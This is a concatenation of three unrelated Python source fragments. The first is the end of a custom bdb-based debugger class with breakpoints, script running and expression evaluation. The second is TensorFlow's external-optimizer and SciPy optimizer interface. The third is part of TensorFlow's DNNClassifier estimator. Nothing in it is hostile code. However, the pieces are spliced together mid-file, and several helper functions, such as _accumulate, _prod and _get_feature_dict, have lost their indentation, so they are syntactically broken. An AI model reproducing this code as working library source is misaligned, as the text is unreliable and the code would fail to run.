            self.set_until(frame, int(args[0]) if args else None)
        elif s in ['o']:
            # Move one level up the captured stack (older frame).
            self.curidx = self.curidx - 1
            self.wait_cmd(self.stack[self.curidx][0])
        elif s in ['i']:
            # Move one level down the captured stack (newer frame).
            self.curidx = self.curidx + 1
            self.wait_cmd(self.stack[self.curidx][0])
        elif s in ['h']:
            self.show_help()
            self.wait_cmd(frame)
        else:
            # Unrecognized input: prompt again.
            self.wait_cmd(frame)

    def show_help(self):
        """Send the command reference text to the UI."""
        self.parent.E_show_help("""
Commands             Description
c                    Continue execution, only stop when a breakpoint is encountered.
n                    Continue execution until the next line in the current function is reached or
                     it returns.
b LINE[ COND|RANGE|c] Set break at LINE in the current file. If a COND expression is supplied, the
                     debugger stops at LINE only when COND evaluates to True. If a RANGE
                     expression (a expression matching the syntax of Python slices) is supplied,
                     the debugger stops at LINE only when the hit count of the breakpoint is one
                     of the numbers generated by RANGE. If letter c appears after LINE, the
                     breakpoint is cleared.
s                    Execute the current line, stop at the first possible occasion (either in a
                     function that is called or in the current function).
q                    Quit the debugger.
r                    Continue execution until the current function returns.
u [LINE]             Without argument, continue execution until the line with a number greater
                     than the current one is reached. With a line number, continue execution
                     until a line with a number greater or equal than LINE is reached. In both
                     cases, also stop when the current frame returns.
o                    Move the current frame one level up in the stack trace (to an older frame).
i                    Move the current frame one level down in the stack trace (to a newer frame).
h                    Show this help.
If no command is given, the previous command is repeated.
""")

    def runscript(self, filename):
        """Run `filename` under the debugger inside a fresh __main__.

        The script has to run in __main__ namespace (or imports from
        __main__ will break), so the real __main__ dict is saved, swapped
        for a minimal one, and restored when the script finishes.
        """
        import __main__
        self.main_copy = __main__.__dict__.copy()
        self.main_debug = {"__name__": "__main__",
                           "__file__": filename,
                           "__builtins__": __builtins__,
                           }
        __main__.__dict__.clear()
        __main__.__dict__.update(self.main_debug)

        # When bdb sets tracing, a number of call and line events happens
        # BEFORE debugger even reaches user's code (and the exact sequence of
        # events depends on python version). So we take special measures to
        # avoid stopping before we reach the main script (see user_line and
        # user_call for details).
        self.mainpyfile = os.path.realpath(filename)
        self._user_requested_quit = False
        with open(filename, "rb") as fp:
            statement = "exec(compile(%r, %r, 'exec'))" % \
                        (fp.read(), self.mainpyfile)

        # Re-install persisted breakpoints into bdb's own tables.
        self.clear_all_breaks()
        for filenam, lines in self.breakpoints.items():
            for l, bpinfo in lines.items():
                self.set_break(filenam, l, bpinfo)

        # Replace pdb's dir with script's dir in front of module search path.
        sys.path[0] = os.path.dirname(self.mainpyfile)
        try:
            self._wait_for_mainpyfile = True
            self.run(statement)
        except SyntaxError:
            print("SyntaxError")
            traceback.print_exc()
            self.parent.E_show_exception("syntax error")
        except:
            # Deliberate catch-all: any error in the user's script drops
            # us into post-mortem debugging on its traceback.
            traceback.print_exc()
            print("Uncaught exception. Entering post mortem debugging")
            typ, val, t = sys.exc_info()
            self.parent.E_show_exception(str(val))
            self.stack, self.curidx = self.get_stack(None, t)
            self.wait_cmd(self.stack[self.curidx][0])
        # Reset hit counters so a re-run starts counting from zero.
        for filenam, lines in self.breakpoints.items():
            for l, bpinfo in lines.items():
                if "hits" in bpinfo:
                    bpinfo["hits"] = 0
        self.parent.E_finished()
        __main__.__dict__.clear()
        __main__.__dict__.update(self.main_copy)

    @contextmanager
    def exit__main__(self, main_dict):
        """Temporarily install `main_dict` as __main__'s namespace.

        The previous namespace is restored on exit, even when the body
        raises.  (The original's `except Exception as e: raise e` clause
        was redundant with the finally block and has been removed.)
        """
        import __main__
        cur_dict = __main__.__dict__.copy()
        __main__.__dict__.clear()
        __main__.__dict__.update(main_dict)
        try:
            yield
        finally:
            __main__.__dict__.clear()
            __main__.__dict__.update(cur_dict)

    def tryeval(self, expr):
        """Evaluate `expr` in the current frame and return its repr.

        On failure, returns the repr of the exception instead of raising.
        NOTE: eval of user-supplied text is intentional (debugger feature).
        """
        try:
            with self.exit__main__(self.main_debug):
                ret = repr(eval(expr, self.curframe.f_globals, self.curframe.f_locals))
            return ret
        except Exception as e:
            return repr(e)

    def toggle_break(self, filename, line):
        """Flip the breakpoint at filename:line on or off."""
        if not filename in self.breakpoints:
            self.breakpoints.update({filename: {}})
        bps = self.breakpoints[filename]
        # After this statement the membership test below reflects the new
        # state, so set/clear is chosen to match it.
        bps.pop(line) if line in bps else bps.update({line: {}})
        (self.set_break if line in bps else self.clear_break)(filename, line)

    def break_here(self, frame):
        """Extend bdb's break test with hit-count range filtering."""
        if not bdb.Bdb.break_here(self, frame):
            return False
        f, l = filename(frame), line(frame)
        bp = self.breakpoints[f][l]
        if not "range" in bp:
            return True
        # Count this hit; stop only when the zero-based count is in range.
        bp["hits"] += 1
        return n_in_range(bp["hits"] - 1, bp['range'])

    def set_break(self, filename, line, bpinfo=None, **kwargs):
        """Set a breakpoint and record its info dict.

        Bug fix: `bpinfo` used to default to a shared mutable `{}`; since
        the dict is *stored* per breakpoint, every breakpoint set without
        explicit info aliased the same object.  A None sentinel gives each
        breakpoint its own fresh dict.
        """
        if bpinfo is None:
            bpinfo = {}
        # Only a condition is meaningful to bdb itself; ranges are handled
        # by our break_here() override.
        bdb.Bdb.set_break(self, filename, line, **(bpinfo if "cond" in bpinfo else {}))
        if not filename in self.breakpoints:
            self.breakpoints.update({filename: {}})
        bps = self.breakpoints[filename]
        if not line in bps:
            bps.update({line: {}})
        bps[line] = bpinfo

    def clear_break(self, filename, line):
        """Remove the breakpoint at filename:line from bdb and our mirror."""
        bdb.Bdb.clear_break(self, filename, line)
        if not filename in self.breakpoints:
            self.breakpoints.update({filename: {}})
        bps = self.breakpoints[filename]
        if line in bps:
            bps.pop(line)

    def filter_vars(self, d):
        """Hook for hiding variables from the UI; currently a pass-through."""
        # try:
        #     d.pop("__builtins__") # this messes up things (not eval defined): copy d first
        # except:
        #     pass
        return d
| |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""TensorFlow interface for third-party optimizers."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gradients
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
__all__ = ['ExternalOptimizerInterface', 'ScipyOptimizerInterface']
class ExternalOptimizerInterface(object):
  """Base class for interfaces with external optimization algorithms.

  Subclass this and implement `_minimize` in order to wrap a new optimization
  algorithm.

  `ExternalOptimizerInterface` should not be instantiated directly; instead use
  e.g. `ScipyOptimizerInterface`.

  @@__init__
  @@minimize
  """

  def __init__(self, loss, var_list=None, equalities=None, inequalities=None,
               **optimizer_kwargs):
    """Initialize a new interface instance.

    Args:
      loss: A scalar `Tensor` to be minimized.
      var_list: Optional list of `Variable` objects to update to minimize
        `loss`. Defaults to the list of variables collected in the graph
        under the key `GraphKeys.TRAINABLE_VARIABLES`.
      equalities: Optional list of equality constraint scalar `Tensor`s to be
        held equal to zero.
      inequalities: Optional list of inequality constraint scalar `Tensor`s
        to be kept nonnegative.
      **optimizer_kwargs: Other subclass-specific keyword arguments.
    """
    self._loss = loss
    self._equalities = equalities or []
    self._inequalities = inequalities or []

    if var_list is None:
      self._vars = variables.trainable_variables()
    else:
      self._vars = list(var_list)

    # Placeholder + assign pairs used by minimize() to write the
    # optimizer's final packed vector back into the TF variables.
    self._update_placeholders = [array_ops.placeholder(var.dtype)
                                 for var in self._vars]
    self._var_updates = [var.assign(array_ops.reshape(placeholder,
                                                      _get_shape_tuple(var)))
                         for var, placeholder in
                         zip(self._vars, self._update_placeholders)]

    loss_grads = _compute_gradients(loss, self._vars)
    equalities_grads = [_compute_gradients(equality, self._vars)
                        for equality in self._equalities]
    inequalities_grads = [_compute_gradients(inequality, self._vars)
                          for inequality in self._inequalities]

    self.optimizer_kwargs = optimizer_kwargs

    # Flatten all variables (and their gradients) into single rank-1
    # tensors so an external optimizer sees one plain vector.
    self._packed_var = self._pack(self._vars)
    self._packed_loss_grad = self._pack(loss_grads)
    self._packed_equality_grads = [
        self._pack(equality_grads)
        for equality_grads in equalities_grads
    ]
    self._packed_inequality_grads = [
        self._pack(inequality_grads)
        for inequality_grads in inequalities_grads
    ]

    # Slices locating each variable's segment inside the packed vector.
    dims = [_prod(_get_shape_tuple(var)) for var in self._vars]
    accumulated_dims = list(_accumulate(dims))
    self._packing_slices = [
        slice(start, end) for start, end in zip(accumulated_dims[:-1],
                                                accumulated_dims[1:])]

  def minimize(self, session=None, feed_dict=None, fetches=None,
               step_callback=None, loss_callback=None, grad_callback=None):
    """Minimize a scalar `Tensor`.

    Variables subject to optimization are updated in-place at the end of
    optimization.

    Note that this method does *not* just return a minimization `Op`, unlike
    `Optimizer.minimize()`; instead it actually performs minimization by
    executing commands to control a `Session`.

    Args:
      session: A `Session` instance.
      feed_dict: A feed dict to be passed to calls to `session.run`.
      fetches: A list of `Tensor`s to fetch and supply to `loss_callback` and
        `grad_callback` as positional arguments.
      step_callback: A function to be called at each optimization step;
        arguments are the current values of all optimization variables
        flattened into a single vector.
      loss_callback: A function to be called every time the loss and gradients
        are computed, with evaluated fetches supplied as positional arguments.
      grad_callback: Deprecated.
    """
    session = session or ops.get_default_session()
    feed_dict = feed_dict or {}
    fetches = fetches or []

    loss_callback = loss_callback or (lambda *fetches: None)
    step_callback = step_callback or (lambda xk: None)

    # TODO(chapelle): Remove grad_callback (b/30590858)
    if grad_callback:
      logging.warn('grad_callback is deprecated. Please use loss_callback.')

    # Construct loss function and associated gradient.
    loss_grad_func = self._make_eval_func(
        [self._loss, self._packed_loss_grad],
        session, feed_dict, fetches, loss_callback)

    # Construct equality constraint functions and associated gradients.
    equality_funcs = self._make_eval_funcs(
        self._equalities, session, feed_dict, fetches)
    equality_grad_funcs = self._make_eval_funcs(
        self._packed_equality_grads, session, feed_dict, fetches)

    # Construct inequality constraint functions and associated gradients.
    inequality_funcs = self._make_eval_funcs(
        self._inequalities, session, feed_dict, fetches)
    inequality_grad_funcs = self._make_eval_funcs(
        self._packed_inequality_grads, session, feed_dict, fetches)

    # Get initial value from TF session.
    initial_packed_var_val = session.run(self._packed_var)

    # Perform minimization.
    packed_var_val = self._minimize(
        initial_val=initial_packed_var_val, loss_grad_func=loss_grad_func,
        equality_funcs=equality_funcs,
        equality_grad_funcs=equality_grad_funcs,
        inequality_funcs=inequality_funcs,
        inequality_grad_funcs=inequality_grad_funcs,
        step_callback=step_callback, optimizer_kwargs=self.optimizer_kwargs)

    # Split the optimizer's result back into per-variable segments.
    var_vals = [packed_var_val[packing_slice]
                for packing_slice in self._packing_slices]

    # Set optimization variables to their new values.
    session.run(self._var_updates,
                feed_dict=dict(zip(self._update_placeholders, var_vals)))

  def _minimize(self, initial_val, loss_grad_func, equality_funcs,
                equality_grad_funcs, inequality_funcs, inequality_grad_funcs,
                step_callback, optimizer_kwargs):
    """Wrapper for a particular optimization algorithm implementation.

    It would be appropriate for a subclass implementation of this method to
    raise `NotImplementedError` if unsupported arguments are passed: e.g. if an
    algorithm does not support constraints but `len(equality_funcs) > 0`.

    Args:
      initial_val: A NumPy vector of initial values.
      loss_grad_func: A function accepting a NumPy packed variable vector and
        returning two outputs, a loss value and the gradient of that loss with
        respect to the packed variable vector.
      equality_funcs: A list of functions each of which specifies a scalar
        quantity that an optimizer should hold exactly zero.
      equality_grad_funcs: A list of gradients of equality_funcs.
      inequality_funcs: A list of functions each of which specifies a scalar
        quantity that an optimizer should hold >= 0.
      inequality_grad_funcs: A list of gradients of inequality_funcs.
      step_callback: A callback function to execute at each optimization step,
        supplied with the current value of the packed variable vector.
      optimizer_kwargs: Other key-value arguments available to the optimizer.

    Returns:
      The optimal variable vector as a NumPy vector.
    """
    raise NotImplementedError(
        'To use ExternalOptimizerInterface, subclass from it and implement '
        'the _minimize() method.')

  @classmethod
  def _pack(cls, tensors):
    """Pack a list of `Tensor`s into a single, flattened, rank-1 `Tensor`."""
    if not tensors:
      return None
    elif len(tensors) == 1:
      return array_ops.reshape(tensors[0], [-1])
    else:
      flattened = [array_ops.reshape(tensor, [-1]) for tensor in tensors]
      # NOTE: old-style concat(axis, values) call order, matching the TF
      # version this file targets.
      return array_ops.concat(0, flattened)

  def _make_eval_func(self, tensors, session, feed_dict, fetches,
                      callback=None):
    """Construct a function that evaluates a `Tensor` or list of `Tensor`s."""
    if not isinstance(tensors, list):
      tensors = [tensors]
    num_tensors = len(tensors)

    def eval_func(x):
      """Function to evaluate a `Tensor`."""
      # Feed the candidate packed vector `x` directly as the variables'
      # values, reshaped back to each variable's own shape.
      augmented_feed_dict = {
          var: x[packing_slice].reshape(_get_shape_tuple(var))
          for var, packing_slice in zip(self._vars, self._packing_slices)
      }
      augmented_feed_dict.update(feed_dict)
      augmented_fetches = tensors + fetches

      augmented_fetch_vals = session.run(
          augmented_fetches, feed_dict=augmented_feed_dict)

      # Extra fetch values (beyond the requested tensors) go to the
      # user-supplied callback.
      if callable(callback):
        callback(*augmented_fetch_vals[num_tensors:])

      return augmented_fetch_vals[:num_tensors]

    return eval_func

  def _make_eval_funcs(self, tensors, session, feed_dict, fetches,
                       callback=None):
    # One eval function per tensor in `tensors`.
    return [
        self._make_eval_func(tensor, session, feed_dict, fetches, callback)
        for tensor in tensors
    ]
class ScipyOptimizerInterface(ExternalOptimizerInterface):
  """Wrapper allowing `scipy.optimize.minimize` to operate a `tf.Session`.

  Example:

  ```python
  vector = tf.Variable([7., 7.], 'vector')

  # Make vector norm as small as possible.
  loss = tf.reduce_sum(tf.square(vector))

  optimizer = ScipyOptimizerInterface(loss, options={'maxiter': 100})

  with tf.Session() as session:
    optimizer.minimize(session)

  # The value of vector should now be [0., 0.].
  ```

  Example with constraints:

  ```python
  vector = tf.Variable([7., 7.], 'vector')

  # Make vector norm as small as possible.
  loss = tf.reduce_sum(tf.square(vector))
  # Ensure the vector's y component is = 1.
  equalities = [vector[1] - 1.]
  # Ensure the vector's x component is >= 1.
  inequalities = [vector[0] - 1.]

  # Our default SciPy optimization algorithm, L-BFGS-B, does not support
  # general constraints. Thus we use SLSQP instead.
  optimizer = ScipyOptimizerInterface(
      loss, equalities=equalities, inequalities=inequalities, method='SLSQP')

  with tf.Session() as session:
    optimizer.minimize(session)

  # The value of vector should now be [1., 1.].
  ```
  """

  _DEFAULT_METHOD = 'L-BFGS-B'

  def _minimize(self, initial_val, loss_grad_func, equality_funcs,
                equality_grad_funcs, inequality_funcs, inequality_grad_funcs,
                step_callback, optimizer_kwargs):

    def loss_grad_func_wrapper(x):
      # SciPy's L-BFGS-B Fortran implementation requires gradients as doubles.
      loss, gradient = loss_grad_func(x)
      return loss, gradient.astype('float64')

    method = optimizer_kwargs.pop('method', self._DEFAULT_METHOD)

    # Express the constraint functions in the dict form scipy expects.
    constraints = [
        {'type': 'eq', 'fun': fn, 'jac': jac}
        for fn, jac in zip(equality_funcs, equality_grad_funcs)
    ]
    constraints += [
        {'type': 'ineq', 'fun': fn, 'jac': jac}
        for fn, jac in zip(inequality_funcs, inequality_grad_funcs)
    ]

    minimize_kwargs = {
        'jac': True,
        'callback': step_callback,
        'method': method,
        'constraints': constraints,
    }
    minimize_kwargs.update(optimizer_kwargs)
    if method == 'SLSQP':
      # SLSQP doesn't support step callbacks. Obviate associated warning
      # message.
      del minimize_kwargs['callback']

    import scipy.optimize  # pylint: disable=g-import-not-at-top
    result = scipy.optimize.minimize(loss_grad_func_wrapper, initial_val,
                                     **minimize_kwargs)

    logging.info('Optimization terminated with:\n'
                 ' Message: %s\n'
                 ' Objective function value: %f\n'
                 ' Number of iterations: %d\n'
                 ' Number of functions evaluations: %d',
                 result.message, result.fun, result.nit, result.nfev)

    return result['x']
def _accumulate(list_):
total = 0
yield total
for x in list_:
total += x
yield total
def _get_shape_tuple(tensor):
return tuple(dim.value for dim in tensor.get_shape())
def _prod(array):
prod = 1
for value in array:
prod *= value
return prod
def _compute_gradients(tensor, var_list):
  """Gradient of `tensor` w.r.t. each variable, with `None` replaced by zeros.

  tf.gradients sometimes returns `None` when it should return 0.
  """
  grads = gradients.gradients(tensor, var_list)
  return [array_ops.zeros_like(var) if grad is None else grad
          for var, grad in zip(var_list, grads)]
| |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Deep Neural Network estimators."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import six
from tensorflow.contrib import layers
from tensorflow.contrib.framework import deprecated
from tensorflow.contrib.framework import deprecated_arg_values
from tensorflow.contrib.framework.python.framework import experimental
from tensorflow.contrib.framework.python.ops import variables as contrib_variables
from tensorflow.contrib.layers.python.layers import optimizers
from tensorflow.contrib.learn.python.learn import evaluable
from tensorflow.contrib.learn.python.learn import metric_spec
from tensorflow.contrib.learn.python.learn import monitors as monitor_lib
from tensorflow.contrib.learn.python.learn import trainable
from tensorflow.contrib.learn.python.learn.estimators import dnn_linear_combined
from tensorflow.contrib.learn.python.learn.estimators import estimator
from tensorflow.contrib.learn.python.learn.estimators import head as head_lib
from tensorflow.contrib.learn.python.learn.estimators import model_fn
from tensorflow.contrib.learn.python.learn.estimators import prediction_key
from tensorflow.contrib.learn.python.learn.utils import export
from tensorflow.python import summary
from tensorflow.python.ops import nn
from tensorflow.python.ops import partitioned_variables
from tensorflow.python.ops import variable_scope
# Name used for the centered-bias weight variable.
# NOTE(review): its consumer is outside this chunk -- confirm usage.
_CENTERED_BIAS_WEIGHT = "centered_bias_weight"

# The default learning rate of 0.05 is a historical artifact of the initial
# implementation, but seems a reasonable choice.
_LEARNING_RATE = 0.05
def _get_feature_dict(features):
if isinstance(features, dict):
return features
return {"": features}
def _get_optimizer(optimizer):
if callable(optimizer):
return optimizer()
else:
return optimizer
def _add_hidden_layer_summary(value, tag):
  """Emit sparsity and activation-histogram summaries for one layer."""
  zero_fraction = nn.zero_fraction(value)
  summary.scalar("%s_fraction_of_zero_values" % tag, zero_fraction)
  summary.histogram("%s_activation" % tag, value)
def _dnn_model_fn(features, labels, mode, params, config=None):
  """Deep Neural Net model_fn.

  Args:
    features: `Tensor` or dict of `Tensor` (depends on data passed to `fit`).
    labels: `Tensor` of shape [batch_size, 1] or [batch_size] labels of
      dtype `int32` or `int64` in the range `[0, n_classes)`.
    mode: Defines whether this is training, evaluation or prediction.
      See `ModeKeys`.
    params: A dict of hyperparameters.
      The following hyperparameters are expected:
      * head: A `_Head` instance.
      * hidden_units: List of hidden units per layer.
      * feature_columns: An iterable containing all the feature columns used by
          the model.
      * optimizer: string, `Optimizer` object, or callable that defines the
          optimizer to use for training. If `None`, will use the Adagrad
          optimizer with a default learning rate of 0.05.
      * activation_fn: Activation function applied to each layer. If `None`,
          will use `tf.nn.relu`.
      * dropout: When not `None`, the probability we will drop out a given
          coordinate.
      * gradient_clip_norm: A float > 0. If provided, gradients are
          clipped to their global norm with this clipping ratio.
      * embedding_lr_multipliers: Optional. A dictionary from
          `EmbeddingColumn` to a `float` multiplier. Multiplier will be used to
          multiply with learning rate for the embedding variables.
    config: `RunConfig` object to configure the runtime settings.

  Returns:
    predictions: A dict of `Tensor` objects.
    loss: A scalar containing the loss of the step.
    train_op: The op for training.
  """
  head = params["head"]
  hidden_units = params["hidden_units"]
  feature_columns = params["feature_columns"]
  optimizer = params.get("optimizer") or "Adagrad"
  activation_fn = params.get("activation_fn")
  dropout = params.get("dropout")
  gradient_clip_norm = params.get("gradient_clip_norm")
  num_ps_replicas = config.num_ps_replicas if config else 0
  embedding_lr_multipliers = params.get("embedding_lr_multipliers", {})

  features = _get_feature_dict(features)
  parent_scope = "dnn"

  # Partition the input layer's variables across parameter servers; the
  # 64MB minimum slice size avoids creating many tiny partitions.
  input_layer_partitioner = (
      partitioned_variables.min_max_variable_partitioner(
          max_partitions=num_ps_replicas,
          min_slice_size=64 << 20))
  input_layer_scope = parent_scope + "/input_from_feature_columns"
  with variable_scope.variable_scope(
      input_layer_scope,
      values=list(six.itervalues(features)),
      partitioner=input_layer_partitioner) as scope:
    net = layers.input_from_feature_columns(
        columns_to_tensors=features,
        feature_columns=feature_columns,
        weight_collections=[parent_scope],
        scope=scope)

  # Hidden layers use a partitioner without the min-slice constraint.
  hidden_layer_partitioner = (
      partitioned_variables.min_max_variable_partitioner(
          max_partitions=num_ps_replicas))
  for layer_id, num_hidden_units in enumerate(hidden_units):
    with variable_scope.variable_scope(
        parent_scope + "/hiddenlayer_%d" % layer_id,
        values=[net],
        partitioner=hidden_layer_partitioner) as scope:
      net = layers.fully_connected(
          net,
          num_hidden_units,
          activation_fn=activation_fn,
          variables_collections=[parent_scope],
          scope=scope)
      # Dropout is applied only during training.
      if dropout is not None and mode == model_fn.ModeKeys.TRAIN:
        net = layers.dropout(
            net,
            keep_prob=(1.0 - dropout))
    _add_hidden_layer_summary(net, scope.name)

  with variable_scope.variable_scope(
      parent_scope + "/logits",
      values=[net],
      partitioner=hidden_layer_partitioner) as scope:
    # Final linear projection onto the label space (no activation).
    logits = layers.fully_connected(
        net,
        head.logits_dimension,
        activation_fn=None,
        variables_collections=[parent_scope],
        scope=scope)
  _add_hidden_layer_summary(logits, scope.name)

  def _train_op_fn(loss):
    """Returns the op to optimize the loss."""
    return optimizers.optimize_loss(
        loss=loss,
        global_step=contrib_variables.get_global_step(),
        learning_rate=_LEARNING_RATE,
        optimizer=_get_optimizer(optimizer),
        gradient_multipliers=(
            dnn_linear_combined._extract_embedding_lr_multipliers(  # pylint: disable=protected-access
                embedding_lr_multipliers, parent_scope, input_layer_scope)),
        clip_gradients=gradient_clip_norm,
        name=parent_scope,
        # Empty summaries to prevent optimizers from logging the training_loss.
        summaries=[])

  return head.head_ops(features, labels, mode, _train_op_fn, logits)
class DNNClassifier(evaluable.Evaluable, trainable.Trainable):
  """A classifier for TensorFlow DNN models.

  Thin wrapper around a generic `Estimator` configured with `_dnn_model_fn`
  and a multi-class classification head.

  Example:

  ```python
  sparse_feature_a = sparse_column_with_hash_bucket(...)
  sparse_feature_b = sparse_column_with_hash_bucket(...)

  sparse_feature_a_emb = embedding_column(sparse_id_column=sparse_feature_a,
                                          ...)
  sparse_feature_b_emb = embedding_column(sparse_id_column=sparse_feature_b,
                                          ...)

  estimator = DNNClassifier(
      feature_columns=[sparse_feature_a_emb, sparse_feature_b_emb],
      hidden_units=[1024, 512, 256])

  # Or estimator using the ProximalAdagradOptimizer optimizer with
  # regularization.
  estimator = DNNClassifier(
      feature_columns=[sparse_feature_a_emb, sparse_feature_b_emb],
      hidden_units=[1024, 512, 256],
      optimizer=tf.train.ProximalAdagradOptimizer(
        learning_rate=0.1,
        l1_regularization_strength=0.001
      ))

  # Input builders
  def input_fn_train: # returns x, y (where y represents label's class index).
    pass
  estimator.fit(input_fn=input_fn_train)

  def input_fn_eval: # returns x, y (where y represents label's class index).
    pass
  estimator.evaluate(input_fn=input_fn_eval)
  estimator.predict(x=x) # returns predicted labels (i.e. label's class index).
  ```

  Input of `fit` and `evaluate` should have following features,
  otherwise there will be a `KeyError`:

  * if `weight_column_name` is not `None`, a feature with
    `key=weight_column_name` whose value is a `Tensor`.
  * for each `column` in `feature_columns`:
    - if `column` is a `SparseColumn`, a feature with `key=column.name`
      whose `value` is a `SparseTensor`.
    - if `column` is a `WeightedSparseColumn`, two features: the first with
      `key` the id column name, the second with `key` the weight column name.
      Both features' `value` must be a `SparseTensor`.
    - if `column` is a `RealValuedColumn`, a feature with `key=column.name`
      whose `value` is a `Tensor`.
  """

  def __init__(self,
               hidden_units,
               feature_columns,
               model_dir=None,
               n_classes=2,
               weight_column_name=None,
               optimizer=None,
               activation_fn=nn.relu,
               dropout=None,
               gradient_clip_norm=None,
               enable_centered_bias=False,
               config=None,
               feature_engineering_fn=None,
               embedding_lr_multipliers=None):
    """Initializes a DNNClassifier instance.

    Args:
      hidden_units: List of hidden units per layer. All layers are fully
        connected. Ex. `[64, 32]` means first layer has 64 nodes and second one
        has 32.
      feature_columns: An iterable containing all the feature columns used by
        the model. All items in the set should be instances of classes derived
        from `FeatureColumn`.
      model_dir: Directory to save model parameters, graph and etc. This can
        also be used to load checkpoints from the directory into a estimator to
        continue training a previously saved model.
      n_classes: number of label classes. Default is binary classification.
        It must be greater than 1. Note: Class labels are integers representing
        the class index (i.e. values from 0 to n_classes-1). For arbitrary
        label values (e.g. string labels), convert to class indices first.
      weight_column_name: A string defining feature column name representing
        weights. It is used to down weight or boost examples during training. It
        will be multiplied by the loss of the example.
      optimizer: An instance of `tf.Optimizer` used to train the model. If
        `None`, will use an Adagrad optimizer.
      activation_fn: Activation function applied to each layer. If `None`, will
        use `tf.nn.relu`.
      dropout: When not `None`, the probability we will drop out a given
        coordinate.
      gradient_clip_norm: A float > 0. If provided, gradients are
        clipped to their global norm with this clipping ratio. See
        `tf.clip_by_global_norm` for more details.
      enable_centered_bias: A bool. If True, estimator will learn a centered
        bias variable for each class. Rest of the model structure learns the
        residual after centered bias.
      config: `RunConfig` object to configure the runtime settings.
      feature_engineering_fn: Feature engineering function. Takes features and
        labels which are the output of `input_fn` and
        returns features and labels which will be fed
        into the model.
      embedding_lr_multipliers: Optional. A dictionary from `EmbeddingColumn` to
        a `float` multiplier. Multiplier will be used to multiply with
        learning rate for the embedding variables.

    Returns:
      A `DNNClassifier` estimator.

    Raises:
      ValueError: If `n_classes` < 2.
    """
    # Kept for the deprecated weights_/bias_ properties below.
    self._hidden_units = hidden_units
    self._feature_columns = feature_columns
    self._enable_centered_bias = enable_centered_bias
    # All training/eval/predict work is delegated to a generic Estimator
    # running _dnn_model_fn with a multi-class head.
    self._estimator = estimator.Estimator(
        model_fn=_dnn_model_fn,
        model_dir=model_dir,
        config=config,
        params={
            "head":
                head_lib._multi_class_head(  # pylint: disable=protected-access
                    n_classes,
                    weight_column_name=weight_column_name,
                    enable_centered_bias=enable_centered_bias),
            "hidden_units": hidden_units,
            "feature_columns": feature_columns,
            "optimizer": optimizer,
            "activation_fn": activation_fn,
            "dropout": dropout,
            "gradient_clip_norm": gradient_clip_norm,
            "embedding_lr_multipliers": embedding_lr_multipliers,
        },
        feature_engineering_fn=feature_engineering_fn)

  def fit(self, x=None, y=None, input_fn=None, steps=None, batch_size=None,
          monitors=None, max_steps=None):
    """See trainable.Trainable. Note: Labels must be integer class indices."""
    # TODO(roumposg): Remove when deprecated monitors are removed.
    hooks = monitor_lib.replace_monitors_with_hooks(monitors, self)
    self._estimator.fit(x=x,
                        y=y,
                        input_fn=input_fn,
                        steps=steps,
                        batch_size=batch_size,
                        monitors=hooks,
                        max_steps=max_steps)
    # Return self so calls can be chained.
    return self

  def evaluate(self, x=None, y=None, input_fn=None, feed_fn=None,
               batch_size=None, steps=None, metrics=None, name=None,
               checkpoint_path=None):
    """See evaluable.Evaluable. Note: Labels must be integer class indices."""
    return self._estimator.evaluate(
        x=x, y=y, input_fn=input_fn, feed_fn=feed_fn, batch_size=batch_size,
        steps=steps, metrics=metrics, name=name,
        checkpoint_path=checkpoint_path)

  @deprecated_arg_values(
      estimator.AS_ITERABLE_DATE, estimator.AS_ITERABLE_INSTRUCTIONS,
      as_iterable=False)
  def predict(self, x=None, input_fn=None, batch_size=None, as_iterable=True):
    """Returns predicted classes for given features.

    Args:
      x: features.
      input_fn: Input function. If set, x must be None.
      batch_size: Override default batch size.
      as_iterable: If True, return an iterable which keeps yielding predictions
        for each example until inputs are exhausted. Note: The inputs must
        terminate if you want the iterable to terminate (e.g. be sure to pass
        num_epochs=1 if you are using something like read_batch_features).

    Returns:
      Numpy array of predicted classes with shape [batch_size] (or an iterable
      of predicted classes if as_iterable is True). Each predicted class is
      represented by its class index (i.e. integer from 0 to n_classes-1).
    """
    key = prediction_key.PredictionKey.CLASSES
    preds = self._estimator.predict(x=x, input_fn=input_fn,
                                    batch_size=batch_size, outputs=[key],
                                    as_iterable=as_iterable)
    if as_iterable:
      # Lazily strip the per-example prediction dict down to the class id.
      return (pred[key] for pred in preds)
    return preds[key].reshape(-1)

  @deprecated_arg_values(
      estimator.AS_ITERABLE_DATE, estimator.AS_ITERABLE_INSTRUCTIONS,
      as_iterable=False)
  def predict_proba(
      self, x=None, input_fn=None, batch_size=None, as_iterable=True):
    """Returns prediction probabilities for given features.

    Args:
      x: features.
      input_fn: Input function. If set, x and y must be None.
      batch_size: Override default batch size.
      as_iterable: If True, return an iterable which keeps yielding predictions
        for each example until inputs are exhausted. Note: The inputs must
        terminate if you want the iterable to terminate (e.g. be sure to pass
        num_epochs=1 if you are using something like read_batch_features).

    Returns:
      Numpy array of predicted probabilities with shape [batch_size, n_classes]
      (or an iterable of predicted probabilities if as_iterable is True).
    """
    key = prediction_key.PredictionKey.PROBABILITIES
    preds = self._estimator.predict(x=x, input_fn=input_fn,
                                    batch_size=batch_size,
                                    outputs=[key],
                                    as_iterable=as_iterable)
    if as_iterable:
      return (pred[key] for pred in preds)
    return preds[key]

  def _get_predict_ops(self, features):
    """See `Estimator` class."""
    # This method exists to support some models that use the legacy interface.
    # pylint: disable=protected-access
    return self._estimator._get_predict_ops(features)

